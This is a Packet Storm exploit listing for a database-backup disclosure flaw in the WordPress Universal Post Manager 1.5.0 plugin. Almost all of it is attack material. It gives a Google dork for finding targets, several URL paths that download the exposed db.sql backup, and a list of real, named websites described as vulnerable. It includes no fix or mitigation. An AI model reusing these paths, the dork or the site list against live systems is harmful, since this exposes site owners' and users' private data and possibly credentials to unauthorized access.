WordPress Universal Post Manager 1.5.0 Database Disclosure

2018-11-22T00:00:00
ID PACKETSTORM:150434
Type packetstorm
Reporter KingSkrupellos
Modified 2018-11-22T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress universal-post-manager 1.5.0 Plugins Database  
Backup Information Disclosure Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 22/11/2018  
# Vendor Homepage : wordpress.org/support/plugin/universal-post-manager/ ~  
github.com/WPPlugins/universal-post-manager  
+ wpplugindirectory.org/universal-post-manager/ ~  
wp-plugins-directory.com/universal-post-manager  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.5.0  
# Software Download Link :  
github.com/WPPlugins/universal-post-manager/archive/master.zip  
# Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''  
# Exploit Risk : Medium  
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
#################################################################################################  
  
# Exploit :  
  
/wp-content/plugins/universal-post-manager/db/db.sql  
  
/PATH/wp-content/plugins/universal-post-manager/db/db.sql  
  
/wpblog/wp-content/plugins/universal-post-manager/db/db.sql  
  
/wordpress/wp-content/plugins/universal-post-manager/db/db.sql  
  
/backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql  
  
[+]  
foodandwinechickie.com/wp-content/plugins/universal-post-manager/db/db.sql  
  
[+]  
imanighana.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql  
  
[+] fwcnb.org/wpblog/wp-content/plugins/universal-post-manager/db/db.sql  
  
[+]  
stumpfsgym.com/wordpress/wp-content/plugins/universal-post-manager/db/db.sql  
  
[+] cc-paysdesainteodile.fr/content/plugins/universal-post-manager/db/db.sql  
  
[+]  
sitebuilder.murrayhill.com/backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`